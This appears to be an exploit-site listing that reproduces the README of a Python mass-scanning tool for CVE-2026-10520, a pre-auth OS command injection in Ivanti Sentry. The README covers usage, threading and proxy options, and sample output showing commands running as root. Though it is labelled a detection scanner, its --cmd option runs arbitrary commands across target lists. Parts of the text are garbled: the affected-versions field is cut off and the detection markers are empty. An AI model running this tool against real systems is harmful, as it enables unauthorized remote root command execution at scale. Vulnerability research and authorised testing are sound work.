Exploit for CVE-2026-10520 CVE-2026-10520 CVE-2026-10523

Name: Exploit for CVE-2026-10520 CVE-2026-10520 CVE-2026-10523
Rating: 5 (13 reviews)
2026-06-10 | CVSS 10.0
## https://sploitus.com/exploit?id=D08D4EF5-0307-5336-8253-F56FE19CCC6B
# CVE-2026-10520 — Ivanti Sentry Mass Scanner

Detection scanner for [CVE-2026-10520](https://nvd.nist.gov/vuln/detail/CVE-2026-10520), an OS command injection vulnerability in Ivanti Sentry.

## Vulnerability Overview

| Field | Value |
|---|---|
| **CVE** | CVE-2026-10520 |
| **CWE** | CWE-78 (OS Command Injection) |
| **Severity** | Critical (CVSS 10.0) |
| **CVSS Vector** | `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` |
| **Affected Versions** | Ivanti Sentry  **Note:** This query may return false positives (Maybe Wrong).

## Scanner

This tool performs non-destructive detection scanning across multiple hosts to identify potentially vulnerable Ivanti Sentry instances.

### Requirements

- Python 3.8+

```bash
pip install -r requirements.txt
```

### Usage

```
python exploit_poc.py --targets hosts.txt --cmd id --output results
```

#### Targets File Format

One target URL per line. Lines starting with `#` are treated as comments and blank lines are skipped. If no scheme is provided, `https://` is assumed.

```
# Example targets.txt
192.168.1.10:8443
https://sentry.example.com
192.168.1.11:8443
```

#### Options

| Flag | Description | Default |
|---|---|---|
| `--targets` | Path to file with one target URL per line | *(required)* |
| `--cmd` | Detection command to run | `id` |
| `--threads` | Max concurrent scan threads | `10` |
| `--rate-limit` | Seconds delay between requests per host | `0.0` |
| `--timeout` | Per-host request timeout (seconds) | `10` |
| `-p, --proxy` | Proxy address:port (e.g., `127.0.0.1:8080`) | — |
| `--output` | Output file base name (CSV + JSON) | — |

#### Examples

```bash
# Basic scan
python exploit_poc.py --targets targets.txt

# Custom command, higher concurrency
python exploit_poc.py --targets targets.txt --cmd 'uname -a' --threads 20

# With proxy and output files
python exploit_poc.py --targets targets.txt --proxy 127.0.0.1:8080 --output results

# Rate-limited scan
python exploit_poc.py --targets targets.txt --rate-limit 0.5
```

### Output

#### Console

Per-host results with color-coded status:

```
  [   VULNERABLE] https://192.168.1.10:8443  HTTP 200  Output: uid=0(root) gid=0(root) ...
  [NOT VULNERABLE] https://192.168.1.11:8443  HTTP 404
  [         ERROR] https://192.168.1.12:8443  HTTP None  Error: Connection timed out
```

Summary at the end:

```
============================================================
  SCAN SUMMARY
============================================================
Total scanned   : 3
Vulnerable      : 1
Not vulnerable  : 1
Errors          : 1
============================================================
```

#### File Output

`--output results` produces two files:

- `results.csv` — structured CSV with columns: `host`, `status`, `http_code`, `command_output_snippet`, `error`
- `results.json` — structured JSON array of the same objects

### Detection Logic

A host is marked **VULNERABLE** when the response satisfies both conditions:

1. Response body contains `Message handled successfully`
2. JSON `data` field contains `...`

The command output text inside `` is extracted and included in results.

## Example
![example](example/example.png)

## Mitigation

- Upgrade to Ivanti Sentry R10.5.2, R10.6.2, or R10.7.1 and later
- Apply vendor-provided patches immediately
- Restrict network access to Ivanti Sentry management interfaces

## References

- [WatchTowr Blog: More evidence that words don't mean what we thought they meant — Ivanti Sentry pre-auth OS command injection (CVE-2026-10520)](https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520)
- [watchTowr Labs — watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523](https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523)

## Disclaimer

This tool is provided for authorized security testing only. Operators must confirm they have written permission from the organization owning the target systems before scanning. Unauthorized scanning may violate applicable laws.

## License

This project is provided as-is for internal security assessment use.